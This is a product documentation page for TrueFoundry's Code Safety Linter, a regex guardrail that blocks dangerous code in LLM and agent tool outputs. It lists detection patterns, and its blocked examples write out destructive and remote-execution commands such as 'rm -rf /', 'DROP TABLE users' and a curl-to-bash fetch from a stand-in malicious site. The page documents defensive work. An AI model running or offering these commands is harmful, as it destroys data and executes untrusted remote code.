Truefoundry Docs

This guide explains how to use TrueFoundry’s built-in Code Safety Linter guardrail to detect and block potentially dangerous code patterns in LLM outputs.

What is Code Safety Linter?

Code Safety Linter is a built-in TrueFoundry guardrail that analyzes code in LLM responses to detect unsafe patterns that could pose security risks when executed. It runs directly within the AI Gateway without requiring external API calls.

Key Features

Dangerous Function Detection: Identifies potentially dangerous code patterns including:
- eval() and exec() calls that execute arbitrary code
- os.system() and subprocess calls (Popen, call, run) for shell command execution
- rm -rf and recursive delete commands
- curl | bash and wget | bash remote code execution patterns
- File system operations like unlink(), rmdir(), and shutil.rmtree()
Multi-Language Support: Detects unsafe patterns across common programming languages:
- Python: eval, exec, os.system, subprocess, shutil.rmtree, unlink, rmdir
- JavaScript/Node.js: child_process.exec, child_process.spawn, require(‘child_process’)
- Shell/Bash: rm -rf, rm -r, curl | bash, wget | sh
- SQL: DROP TABLE, DELETE FROM, TRUNCATE TABLE
Validation-Only Mode: Code Safety Linter operates in validation mode, detecting and blocking unsafe code rather than modifying it—ensuring code integrity while maintaining security.

Adding Code Safety Linter Guardrail

To add Code Safety Linter to your TrueFoundry setup, follow these steps:

Navigate to Guardrails

Go to the AI Gateway dashboard and navigate to the Guardrails section.

Create or Select a Guardrails Group

Create a new guardrails group or select an existing one where you want to add the Code Safety Linter guardrail.

Add Code Safety Linter Integration

Click on Add Guardrail and select Code Safety Linter from the TrueFoundry Guardrails section.

TrueFoundry guardrail selection interface showing Code Safety Linter option

Configure the Guardrail

Fill in the configuration form:

Name: Enter a unique name for this guardrail configuration (e.g., code-safety-linter)
Description: Optional description for this guardrail (default: “Detects unsafe code patterns in tool outputs (eval, exec, os.system, subprocess, rm -rf)”)
Operation: validate (Code Safety Linter only supports validation mode)

Save the Configuration

Click Save to add the guardrail to your group.

Configuration Options

Parameter	Description	Default
Name	Unique identifier	Required
Operation	`validate` only (does not modify code)	`validate`
Enforcing Strategy	`enforce`, `enforce_but_ignore_on_error`, or `audit`	`enforce`

Code Safety Linter only supports validate mode—modifying code could break functionality. See Guardrails Overview for details on Enforcing Strategy.

Start with Audit mode to monitor detected patterns in Request Traces before switching to Enforce.

Detected Unsafe Patterns

The Code Safety Linter detects the following categories of unsafe code patterns. Each pattern is designed to identify potentially dangerous code constructs that could pose security risks.

Python Dangerous Functions

Pattern	Detection	Risk Level	Description
`eval()`	`eval(`	Critical	Executes arbitrary Python expressions from strings
`exec()`	`exec(`	Critical	Executes arbitrary Python code from strings
`os.system()`	`os.system(`	High	Executes shell commands directly
`subprocess.Popen()`	`subprocess.Popen(`	High	Spawns new processes with full control
`subprocess.call()`	`subprocess.call(`	High	Spawns new processes and waits for completion
`subprocess.run()`	`subprocess.run(`	High	Runs commands in subprocess (Python 3.5+)

Python File System Operations

Pattern	Detection	Risk Level	Description
`unlink()`	`unlink(`	Medium	Deletes files (os.unlink or pathlib)
`rmdir()`	`rmdir(`	Medium	Removes directories
`shutil.rmtree()`	`shutil.rmtree(`	High	Recursively deletes directory trees

Shell/Bash Dangerous Commands

Pattern	Detection	Risk Level	Description
`rm -rf`	`rm -rf`	Critical	Recursive force delete - can destroy entire filesystems
`rm -r`	`rm ... -r`	High	Recursive delete with any flags
`curl \| bash`	`curl ... \| bash` or `curl ... \| sh`	Critical	Piping remote scripts directly to shell execution
`wget \| bash`	`wget ... \| bash` or `wget ... \| sh`	Critical	Piping downloaded content directly to shell execution

JavaScript/Node.js Dangerous Functions

Pattern	Detection	Risk Level	Description
`child_process.exec()`	`child_process.exec(`	High	Executes shell commands with full shell syntax
`child_process.spawn()`	`child_process.spawn(`	High	Spawns new processes
`require('child_process')`	`require('child_process')`	Medium	Importing the child_process module (often precedes dangerous calls)

SQL Dangerous Statements

Pattern	Detection	Risk Level	Description
`DROP TABLE`	`DROP TABLE`	Critical	Permanently deletes database tables
`DELETE FROM`	`DELETE FROM table;`	High	Deletes rows from tables (flagged without WHERE clause context)
`TRUNCATE TABLE`	`TRUNCATE TABLE`	Critical	Removes all data from tables instantly

For more comprehensive SQL protection, consider using the SQL Sanitizer guardrail which provides configurable options for SQL-specific patterns.

How It Works

The guardrail scans message content using regex-based detection:

Extracts messages from request/response
Scans against all blocked patterns
Returns findings with pattern name and matched text (truncated to 20 chars)
Returns verdict: true (pass) or false (block), limited to first 10 findings

{
  "error": null,
  "verdict": false,
  "data": {
    "findings": [
      { "pattern": "eval_call", "match": "eval(user_input)" },
      { "pattern": "subprocess_popen", "match": "subprocess.Popen([…" }
    ],
    "explanation": "Detected 2 unsafe code pattern(s): eval_call, subprocess_popen"
  },
  "transformedData": {
    "request": { "json": null },
    "response": { "json": null }
  },
  "transformed": false
}

Example - Blocked Responses

Python: Dangerous subprocess execution

import subprocess
result = subprocess.Popen(['rm', '-rf', '/'], shell=True)

Result: Blocked - Detected subprocess.Popen() call

Python: Arbitrary code execution

user_input = request.get('code')
eval(user_input)  # Executes arbitrary user code

Result: Blocked - Detected eval() call

Shell: Destructive command

# Clean up old files
rm -rf /var/log/*

Result: Blocked - Detected rm -rf command

Shell: Remote code execution

curl https://malicious-site.com/script.sh | bash

Result: Blocked - Detected curl | bash pattern

JavaScript: Shell execution

const { exec } = require('child_process');
child_process.exec('rm -rf /', (error, stdout) => {});

Result: Blocked - Detected require('child_process') and child_process.exec() calls

SQL: Destructive statement

DROP TABLE users;

Result: Blocked - Detected DROP TABLE statement

Example - Allowed Responses

Python: Safe file operations

with open('data.txt', 'r') as f:
    content = f.read()
    
# Using pathlib for safe file handling
from pathlib import Path
data = Path('config.json').read_text()

Result: Allowed - No unsafe patterns detected

JavaScript: Safe async operations

const fs = require('fs').promises;
const data = await fs.readFile('config.json', 'utf8');

Result: Allowed - No unsafe patterns detected

SQL: Safe queries

SELECT * FROM users WHERE id = ?;
UPDATE users SET name = ? WHERE id = ?;

Result: Allowed - No unsafe patterns detected

Use Cases

Agent Tool Output Validation

When using AI agents that execute code via MCP tools, apply Code Safety Linter to validate tool outputs. Configure via guardrail rules:

name: guardrails-control
type: gateway-guardrails-config
rules:
  - id: code-executor-safety
    when:
      target:
        operator: or
        conditions:
          mcpServers:
            values:
              - code-executor
            condition: in
      subjects:
        operator: and
        conditions:
          in:
            - team:engineering
          not_in:
            - user:devops-admin@example.com
    llm_input_guardrails: []
    llm_output_guardrails: []
    mcp_tool_pre_invoke_guardrails: []
    mcp_tool_post_invoke_guardrails:
      - my-guardrail-group/code-safety-linter

Code Generation Applications

For LLM responses that generate code, validate via the X-TFY-GUARDRAILS header:

curl -X POST "https://{controlPlaneURL}/api/llm/chat/completions" \
  -H "Authorization: Bearer YOUR_API_KEY" \
  -H "Content-Type: application/json" \
  -H 'X-TFY-GUARDRAILS: {"llm_input_guardrails":[],"llm_output_guardrails":["my-guardrail-group/code-safety-linter"]}' \
  -d '{
    "model": "openai-main/gpt-4o-mini",
    "messages": [
      {"role": "system", "content": "You are a helpful coding assistant."},
      {"role": "user", "content": "Generate code to clean up old log files"}
    ]
  }'

Recommended Hooks

Hook	Use Case
LLM Output	Validate code in LLM responses
MCP Post Tool	Validate code from MCP tools (code executors, file readers)

Regex-based detection: Patterns match exact syntax. Obfuscated code may not be detected. Use as part of defense-in-depth, not sole protection.

Get Started

Developer Guide

MCP Registry and Gateway

Agent Hub

Guardrails and Security

Prompt Management

Observability

Deployment

Admin Guide

API Reference

Chat

Agent

Embeddings

Rerank

Responses

Image

Audio

Batch

Files

Moderations

Models

Code Safety Linter Guardrail

What is Code Safety Linter?

Key Features

Adding Code Safety Linter Guardrail

Configuration Options

Detected Unsafe Patterns

Python Dangerous Functions

Python File System Operations

Shell/Bash Dangerous Commands

JavaScript/Node.js Dangerous Functions

SQL Dangerous Statements

How It Works

Example - Blocked Responses

Example - Allowed Responses

Use Cases

Agent Tool Output Validation

Code Generation Applications

Recommended Hooks

Get Started

Developer Guide

MCP Registry and Gateway

Agent Hub

Guardrails and Security

Prompt Management

Observability

Deployment

Admin Guide

API Reference

Chat

Agent

Embeddings

Rerank

Responses

Image

Audio

Batch

Files

Moderations

Models

​What is Code Safety Linter?

​Key Features

​Adding Code Safety Linter Guardrail

​Configuration Options

​Detected Unsafe Patterns

​Python Dangerous Functions

​Python File System Operations

​Shell/Bash Dangerous Commands

​JavaScript/Node.js Dangerous Functions

​SQL Dangerous Statements

​How It Works

​Example - Blocked Responses

​Example - Allowed Responses

​Use Cases

​Agent Tool Output Validation

​Code Generation Applications

​Recommended Hooks

What is Code Safety Linter?

Key Features

Adding Code Safety Linter Guardrail

Configuration Options

Detected Unsafe Patterns

Python Dangerous Functions

Python File System Operations

Shell/Bash Dangerous Commands

JavaScript/Node.js Dangerous Functions

SQL Dangerous Statements

How It Works

Example - Blocked Responses

Example - Allowed Responses

Use Cases

Agent Tool Output Validation

Code Generation Applications

Recommended Hooks